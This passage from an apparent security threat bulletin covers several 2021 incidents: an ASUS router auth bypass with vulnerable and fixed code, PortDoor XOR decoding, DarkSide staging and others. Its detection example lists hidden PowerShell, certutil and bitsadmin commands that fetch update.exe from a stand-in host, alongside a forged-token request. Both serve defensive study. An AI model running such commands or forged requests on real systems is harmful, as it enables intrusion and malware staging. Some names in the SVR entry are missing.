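    """Model of the flawed check in CVE-2021-32030 (not the firmware's code):
    a session token that starts with a NUL byte, sent with the internal
    user-agent, is accepted when the router has no ifttt_token set."""
    token = request.get("asus_token", "")
    if token and token == device["asus_token"]:
        return True                        # genuine session
    if (token.startswith("\x00")
            and request.get("user_agent") == INTERNAL_SERVICE_UA
            and not device.get("ifttt_token")):
        return True                        # BUG: every condition is attacker-controlled
    return False


def is_authenticated_fixed(request, device):
    """Hardened check: only a full, constant-time match of a well-formed
    session token counts; request headers and device state grant nothing."""
    token = request.get("asus_token", "")
    if not token or any(ord(c) < 0x20 for c in token):
        return False                       # empty or control characters: reject
    return hmac.compare_digest(token.encode(), device["asus_token"].encode())


# Constructed device state and requests for demonstration.
DEVICE = {"asus_token": "5f0c2b9d7e4a4c1b", "ifttt_token": ""}
FORGED = {"asus_token": "\x00anything", "user_agent": INTERNAL_SERVICE_UA}
LEGIT = {"asus_token": "5f0c2b9d7e4a4c1b", "user_agent": "Mozilla/5.0"}

if __name__ == "__main__":
    print("forged, vulnerable check:", is_authenticated_vulnerable(FORGED, DEVICE))   # True
    print("forged, fixed check     :", is_authenticated_fixed(FORGED, DEVICE))        # False
    print("legit,  fixed check     :", is_authenticated_fixed(LEGIT, DEVICE))         # True
```

The general lesson is the one the fixed version encodes: a User-Agent header is an attacker-supplied string, an unset configuration value must never widen access, and token comparison should be a single constant-time equality check on a value that has already been rejected if it is empty or contains control bytes.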

Recommendation Apply the latest firmware release provided by ASUS.

Patch URL https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/

Reference https://nvd.nist.gov/vuln/detail/CVE-2021-32030

PORTDOOR MALWARE TAKES DOWN RUSSIAN DEFENSE FIRM A new backdoor dubbed PortDoor was recently used in an attack on a Russian defense contractor. The attack is attributed to a Chinese APT (advanced persistent threat) group, which used a range of tools and exploits to accomplish its objectives.

Affected Systems ◾ All Systems

Vulnerability Overview According to Cybereason, the attack began with a weaponized document built with RoyalRoad (also known as the 8.t dropper), a document builder used in the past by several China-linked APT groups, including Tick, Tonto Team, and TA428. RoyalRoad generates RTF documents that exploit well-known vulnerabilities in Microsoft's Equation Editor (such as CVE-2017-11882). This tooling is one reason researchers attribute the attack to a China-associated group; other evidence includes the social-engineering style of the lure and code similarities between PortDoor and other backdoors used by similarly attributed groups.

Once the RTF document is opened, the exploit drops PortDoor, which then communicates with a command-and-control (C2) server. The backdoor supports reconnaissance, target profiling, downloading additional payloads, privilege escalation, evasion of static detection (obfuscation), encryption, and data exfiltration. It decrypts its configuration and commands with an XOR key hardcoded in its data.

PortDoor creates additional files in a Temp folder and writes other data as needed to disguise its activity. According to Cybereason, the C2 server can issue the following commands:

◾ List running processes
◾ Open process
◾ Get free space in logical drives
◾ File enumeration
◾ Delete file
◾ Move file
◾ Create a process with a hidden window
◾ Open file for simultaneous operations
◾ Write to file
◾ Close handle
◾ Open file and write directly to disk
◾ Look for the "Kr*^j4" string
◾ Create pipe, copy data from it, and AES encrypt
◾ Write data to file, append with "\n"
◾ Write data to file, append with "exit\n"

PortDoor also includes anti-analysis techniques and several ways of encrypting and disguising its actions, which together make it a capable and dangerous backdoor.
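A hardcoded XOR key is the weakest part of a design like this, and the standard analyst response is known-plaintext key recovery. The block below is an added example, not PortDoor's code or Cybereason's tooling: it decrypts a repeating-key XOR blob, recovers the key from a short known prefix, and splits the result into newline-terminated commands. The 3-byte key and the two command strings are placeholders I constructed; the real PortDoor key and command format are not reproduced here.

```python
from itertools import cycle


def xor_bytes(data, key):
    """XOR data with a repeating key (the same function encrypts and decrypts)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_xor_key(ciphertext, known_prefix, max_key_len=32):
    """Known-plaintext recovery of a repeating XOR key: for each candidate
    length derive the key from the leading bytes, keep the shortest key that
    decrypts the whole known prefix. The prefix must be longer than the key so
    at least one byte verifies the guess. Returns None if nothing fits."""
    for key_len in range(1, min(max_key_len, len(known_prefix) - 1) + 1):
        candidate = xor_bytes(ciphertext[:key_len], known_prefix[:key_len])
        if xor_bytes(ciphertext[:len(known_prefix)], candidate) == known_prefix:
            return candidate
    return None


def decode_commands(blob, key):
    """Decrypt a newline-terminated command blob and split it into commands."""
    return [c for c in xor_bytes(blob, key).split(b"\n") if c]


# Constructed sample: a placeholder 3-byte key and two tasking strings.
SAMPLE_KEY = b"\x5a\xc3\x17"
SAMPLE_COMMANDS = b"cmd: list running processes\ncmd: enumerate files C:\\Temp\n"
SAMPLE_BLOB = xor_bytes(SAMPLE_COMMANDS, SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_xor_key(SAMPLE_BLOB, b"cmd: ")
    print("recovered key:", key.hex())
    for command in decode_commands(SAMPLE_BLOB, key):
        print(command.decode())
```

In practice the known prefix comes from whatever the protocol makes predictable: a fixed command verb, a magic marker such as the "Kr*^j4" string the backdoor looks for, or a PE header in a decrypted payload. With a 16-byte key you need a known run of at least 17 bytes for the check to mean anything, which is why the function refuses to return a key as long as the prefix itself.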

Recommendation As with most APT campaigns, initial access relies on successful social engineering, such as phishing or whaling, so make sure your users are trained to recognize such attacks. Patch Microsoft Office (the Equation Editor flaws abused by RoyalRoad are years old) and keep the usual threat-mitigation controls in place.

Reference
https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/
https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector


MORIYA ROOTKIT USED TO BACKDOOR WINDOWS SYSTEMS An unknown threat actor suspected to be of Chinese origin is using a new stealthy rootkit. The espionage campaign, named TunnelSnake, appears to have been operating since 2018 against Windows systems. The rootkit, named Moriya by researchers, is a passive backdoor that lets the attackers spy on their victims and issue commands to compromised hosts without generating outbound beacons.

Affected Systems ◾ Windows systems; the campaign has been active since 2018

Vulnerability Overview Analysts report that the attackers have backdoored systems belonging to high-profile organizations, including diplomatic entities in Asia and Africa. Once installed, Moriya inspects network traffic from within the Windows kernel's address space, where only privileged, trusted code runs, waiting for specially crafted packets that carry attacker commands. During post-exploitation the attackers also deploy tools such as China Chopper, BOUNCER, and Termite, which let them move laterally and compromise additional hosts on the network.

Recommendation Keep operating systems and software fully patched and run current antivirus and antimalware software. Verify email attachments before opening them or clicking embedded links, and download software only from trusted sites or the developers' own sites.

Reference https://www.bleepingcomputer.com/news/security/new-moriya-rootkit-used-in-the-wild-to-backdoor-windows-systems/

VPN & CRYPTOCURRENCY CREDENTIALS BEING TARGETED A new variant of a cryptocurrency-stealing malware, Panda Stealer, is being distributed through a global spam campaign and through links shared on the communication app Discord. Victims have been confirmed in the US, Australia, Japan, and Germany. The malware takes screenshots, exfiltrates system data, steals browser cookies, and harvests credentials for NordVPN, Telegram, Discord, and Steam. It also searches for cryptocurrency wallet keys, and with them the funds those wallets control.

Affected Systems ◾ Crypto-Currency Keys ◾ VPN Credentials


Vulnerability Overview Panda Stealer uses business-themed phishing emails, usually a request for a quote, to reach its victims. Two delivery methods are used: an attached .XLSM document that requires the victim to enable macros, and an .XLS file containing an Excel formula that launches a hidden PowerShell script. Panda Stealer appears to be a variant of the Collector Stealer, with similar code but different infrastructure such as C2 URLs and folders. Because a cracked version of Collector Stealer is openly available, actors of any skill level can build customized versions of the stealer and its C2 panel.

Recommendation Treat unsolicited Discord links and unverified business emails with caution, and do not enable macros in documents from unknown senders; blocking the lure stops the stealer before it reaches the system.

Reference https://www.zdnet.com/article/panda-stealer-dropped-in-discord-to-steal-user-cryptocurrency/?&web_view=true

SIX VULNERABILITIES DISCOVERED WITH REMOTE MOUSE Remote Mouse is an application that lets a mobile phone be used as a keyboard and mouse for a computer: users install a server component on the computer and the app on their phone, and the two communicate over the network. A security researcher has disclosed six zero-day vulnerabilities in it, collectively nicknamed 'Mouse Trap'.

Affected Systems ◾ Users of the Remote Mouse application (Android and iOS app together with its computer-side server component)

Vulnerability Overview The flaws were discovered by analyzing the packets exchanged between the server on the computer and the app on the phone. They include the ability to capture a user's password or replay commands sent to the computer, to maximize or minimize the windows of running processes, to abuse the app's use of plain HTTP for update checks and requests, and more.

More detail is available in the write-up of the researcher who discovered the flaws: https://axelp.io/MouseTrap

Recommendation The vulnerabilities were reported to the Remote Mouse vendor, but no fix has been released at the time of writing. We recommend removing the application where it is not necessary, and restricting network access to its server component where it is.


Reference https://thehackernews.com/2021/05/6-unpatched-flaws-disclosed-in-remote.html

MILLIONS OF DELL SYSTEMS AT RISK For the past 12 years, Dell has shipped a driver, DBUtil (dbutil_2_3.sys), now confirmed to contain multiple vulnerabilities that allow privilege escalation. Hundreds of millions of Dell desktops, laptops, and tablets received the driver through BIOS updates. The five flaws in the driver are tracked collectively as CVE-2021-21551.

Affected Systems ◾ Dell systems with the DBUtil driver (dbutil_2_3.sys) installed

Vulnerability Overview Although the vulnerabilities affect a very large number of systems, they are rated High rather than Critical because an attacker must already have code running on the machine, as a low-privileged user, to exploit them. They do, however, let an attacker or malware escalate to kernel privileges and establish persistence on the compromised system. At the time of writing there were no indications of exploitation in the wild, but that can change quickly.

SentinelLabs has released a video demonstrating how the vulnerabilities can be exploited, available at https://assets.sentinelone.com/labs/Dell.

Recommendation Use Dell's remediation page (Patch URL below) to check for the vulnerable driver and remove it immediately; step-by-step instructions are provided there.

Patch URL https://www.dell.com/support/home/ro-ro/drivers/driversdetails?driverid=7PR57

Reference https://www.bleepingcomputer.com/news/security/vulnerable-dell-driver-puts-hundreds-of-millions-of-systems-at-risk/

THE LARGEST PIPELINE IN THE US ATTACKED BY DARKSIDE RANSOMWARE Colonial Pipeline, the largest fuel pipeline in the US, carries refined petroleum products from Gulf Coast refineries to the East Coast and supplies roughly 45% of the East Coast's fuel. The company shut down pipeline operations in response to a ransomware attack. The DarkSide ransomware, first seen in August 2020, is believed to be responsible for the compromise and subsequent shutdown.


Affected Systems ◾ All Systems

Vulnerability Overview DarkSide is ransomware that encrypts the victim's data and also steals it, threatening to leak it publicly if the ransom is not paid. It is believed to operate out of Russia or neighbouring former Soviet states (the malware avoids systems whose keyboard layouts belong to that region) and mainly targets English-speaking countries. The operators claim to avoid hospitals, schools, non-profit organizations, and government agencies.

After gaining initial access to a network, DarkSide actors check that the organization is not on their excluded list, collect as much information as possible, and use PowerShell to download a binary called update.exe, also using certutil.exe and bitsadmin.exe as download methods. The binary is saved into C:\Windows and temporary directories; the actors then create a network share and place a copy of the DarkSide malware in it using PowerShell.

From there, the DarkSide actors move laterally to the domain controller to collect data, retrieving the DarkSide copy from the shared folder with PowerShell. The ransomware then spreads to and compromises devices across the network and encrypts their assets.
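The download-and-stage chain described above (certutil/bitsadmin/PowerShell fetching update.exe into C:\Windows or a temp directory, then a share created from PowerShell) is what a defender most wants to surface from process-creation telemetry. The following is an added example written for this note, not Braintrace tooling or a published DarkSide signature: it runs three simple rules over constructed Sysmon-style process-creation lines and escalates when a LOLBin download is followed by share creation on the same host. Host names, user names, URLs, the log format and the 15-minute correlation window are all assumptions.

```python
"""Flag the DarkSide-style staging chain in Windows process-creation logs.
Added example; hosts, users, URLs and the log format are constructed."""
import re
from datetime import datetime, timedelta
from typing import List, NamedTuple, Tuple


class ProcEvent(NamedTuple):
    ts: datetime
    host: str
    user: str
    image: str
    parent: str
    cmdline: str


# Constructed sample log lines (hypothetical). Format:
# timestamp|host|user|image|parent_image|command_line
SAMPLE_LOGS = r"""
2021-05-10T02:11:03Z|WS-0142|CORP\jdoe|C:\Windows\System32\certutil.exe|C:\Windows\System32\cmd.exe|certutil.exe -urlcache -split -f http://files.example.invalid/update.exe C:\Windows\Temp\update.exe
2021-05-10T02:11:05Z|WS-0142|CORP\jdoe|C:\Windows\System32\bitsadmin.exe|C:\Windows\System32\cmd.exe|bitsadmin /transfer job1 /download /priority high http://files.example.invalid/update.exe C:\Windows\update.exe
2021-05-10T02:11:09Z|WS-0142|CORP\jdoe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\cmd.exe|powershell -nop -w hidden (New-Object Net.WebClient).DownloadFile('http://files.example.invalid/update.exe','C:\Users\jdoe\AppData\Local\Temp\update.exe')
2021-05-10T02:12:40Z|WS-0142|CORP\jdoe|C:\Windows\System32\net.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|net share staging=C:\staging /grant:everyone,full
2021-05-10T02:30:00Z|WS-0142|CORP\jdoe|C:\Windows\System32\certutil.exe|C:\Windows\System32\cmd.exe|certutil -verify -urlfetch C:\certs\server.cer
2021-05-10T02:31:00Z|WS-0142|CORP\jdoe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\explorer.exe|"WINWORD.EXE" /n report.docx
"""


def parse_logs(text: str) -> List[ProcEvent]:
    """Parse the pipe-delimited constructed format into ProcEvent records."""
    events = []
    for line in text.strip().splitlines():
        ts, host, user, image, parent, cmdline = line.split("|", 5)
        events.append(ProcEvent(datetime.fromisoformat(ts.replace("Z", "+00:00")),
                                host, user, image, parent, cmdline))
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Download switches of the three living-off-the-land binaries named in the report.
DOWNLOAD_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-urlfetch\b.*https?://", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/download|/addfile", re.I),
    "powershell.exe": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
}
# An .exe written directly under C:\Windows or into any ...\Temp directory.
STAGING_PATH = re.compile(r"[A-Z]:\\(Windows|.*\\Temp)\\[^\s'\"]*\.exe", re.I)


def lolbin_download(ev: ProcEvent) -> bool:
    pat = DOWNLOAD_PATTERNS.get(basename(ev.image))
    return bool(pat and pat.search(ev.cmdline))


def exe_written_to_windows_or_temp(ev: ProcEvent) -> bool:
    return STAGING_PATH.search(ev.cmdline) is not None


def share_created_from_powershell(ev: ProcEvent) -> bool:
    return (basename(ev.image) in ("net.exe", "net1.exe")
            and re.search(r"\bshare\b\s+\S+=", ev.cmdline, re.I) is not None
            and basename(ev.parent) == "powershell.exe")


RULES = [
    ("lolbin_download", lolbin_download),
    ("exe_written_to_windows_or_temp", exe_written_to_windows_or_temp),
    ("share_created_from_powershell", share_created_from_powershell),
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event_index, rule_name) for every rule that fires on an event."""
    return [(i, name) for i, ev in enumerate(events) for name, pred in RULES if pred(ev)]


def correlate(events: List[ProcEvent], hits: List[Tuple[int, str]],
              window: timedelta = timedelta(minutes=15)) -> List[Tuple[str, str]]:
    """Escalate when a host shows a LOLBin download followed, within `window`,
    by a share created from PowerShell. The window is an assumed tuning value."""
    downloads = [events[i] for i, n in hits if n == "lolbin_download"]
    shares = [events[i] for i, n in hits if n == "share_created_from_powershell"]
    found = {(s.host, s.ts.isoformat()) for s in shares
             if any(d.host == s.host and timedelta(0) <= s.ts - d.ts <= window for d in downloads)}
    return sorted(found)


if __name__ == "__main__":
    evs = parse_logs(SAMPLE_LOGS)
    hits = evaluate(evs)
    for i, rule in hits:
        print(f"{evs[i].ts:%H:%M:%S} {evs[i].host} {rule}: {evs[i].cmdline[:60]}")
    print("escalations:", correlate(evs, hits))
```

The benign certutil certificate check and the Word launch in the sample deliberately fire nothing; the three download lines and the net share line fire individually, and only their combination on one host within the window produces the escalation.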

Recommendation Keep systems patched, deploy solutions with anti-ransomware features, and routinely back up files to a remote server. Further, test to verify that your backup mechanisms can survive a ransomware attack.

Reference https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware#:~:text=Like%20many%20other%20ransomware%20variants,ransom%20demand%20is%20not%20paid.

TWITTER TIP JAR SPARKS PRIVACY CONCERNS Twitter is rolling out a new feature for Android and iOS called "Tip Jar," which lets people send tips to support the work of others. Like every new feature or app, it has some possible flaws. For "Tip Jar," these include exposing tippers' shipping addresses to recipients and the way disputes are handled.

Affected Systems ◾ The new PayPal-enabled Twitter Tip Jar for Android and iOS

Vulnerability Overview The new feature offered by Twitter is a way to support people or groups on the platform by giving them rewards or tips. There are various ways to tip, such as Venmo, Bandcamp, Cash App, PayPal, and Patreon. Twitter has said it will not take a cut of the tip, but some of the payment networks may charge a fee or percentage. Users are noticing that if they tip with PayPal, their mailing address is exposed to whomever they are tipping.

BRAINTRACE.COM CONFIDENTIAL 17

The dispute process also needs attention: if a tipper disputes the tip, the recipient must pay a $20 dispute charge plus payment processing fees in addition to the refund. In other words, if someone were to send five fraudulent donations, the recipient is hit with $100 in chargeback fees once the donations are reversed. At this time, PayPal and Twitter have not said what they will do to prevent malicious actors from abusing this new feature.

Recommendation Users of this new add-on should be aware that their address may be disclosed to the person or group they are tipping. To avoid sending the address, select the "No address needed" option in the drop-down box. Users are also advised to read the dispute section carefully.

Reference https://www.bleepingcomputer.com/news/security/twitter-tip-jar-may-expose-paypal-address-sparks-privacy-concerns/

VULNERABILITIES CURRENTLY EXPLOITED BY RUSSIAN HACKERS The US Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA), the FBI, the National Security Agency (NSA), and the UK National Cyber Security Centre have published a joint advisory warning about vulnerabilities that Russian hackers are currently exploiting. The Russian groups behind these attacks are , APT29, and the Dukes. The advisory was prompted by several cyber-attacks in 2020, one of them the SolarWinds compromise, which affected many institutions and businesses. The advisory warns about the SVR and its capabilities. Its targets include the US, Europe, the UK, NATO states, and 's neighboring countries.

Affected Systems ◾ FortiGate ◾ Cisco router ◾ Oracle WebLogic Server ◾ Zimbra ◾ Pulse Secure ◾ Citrix ◾ Kibana ◾ VMWare ◾ F5 Big-IP ◾ Oracle WebLogic ◾ VMWare vSphere

Vulnerability Overview The agencies warn that Russian hackers have developed sophisticated techniques that allow them to carry out malicious actions without being detected. The attackers use the Sliver framework, which gives them persistent access from which to exploit further vulnerabilities; one recently exploited target is Microsoft Exchange. Sliver is a tool used by penetration testers, but in this case it is being used for malicious activity. These attackers are also known to target mail servers, which allows them to access and compromise data.

Recommendation Apply the available patches and enable multi-factor authentication. Full mitigation instructions from the joint advisory can be found at https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf.

Reference https://www.zdnet.com/article/cybersecurity-warning-russian-hackers-are-targeting-these-vulnerabilities-so-patch-now/

POTENTIAL SECURITY THREATS IN RECYCLED PHONE NUMBERS About 66% of recycled mobile phone numbers were found to still be tied to their previous owners' online accounts. Threat actors could hijack those accounts by recovering the accounts linked to the recycled numbers. Academic research from Princeton University has revealed several privacy and security concerns with reusing recycled phone numbers; they can enable account takeovers, spam and phishing attacks, and can prevent victims from signing up for online services.

Affected Systems ◾ Recycled phone numbers

Vulnerability Overview Threat actors can browse the available phone numbers shown on carriers' online number-change interfaces and check whether any are still associated with the previous owners' online accounts (bank accounts, social media, etc.). If so, attackers can use the phone number associated with an account to reset its password and to receive the OTP sent via SMS at login.

The attack hinges on the lack of query limits on the carriers' prepaid number-change interfaces. Besides displaying full numbers, these interfaces let attackers look up recycled numbers before committing to a number change.

Once the bad actors obtain a recycled number, they can launch impersonation attacks to commit fraud and gather the previous owner's PII. Other threats enabled by number recycling affect both previous and future owners, allowing a malicious actor to hijack a victim's phone account and online accounts and even to perform denial-of-service attacks.

Recommendation Consider unlinking your phone number from online services before you give up your number.


Reference https://thehackernews.com/2021/05/new-study-warns-of-security-threats.html
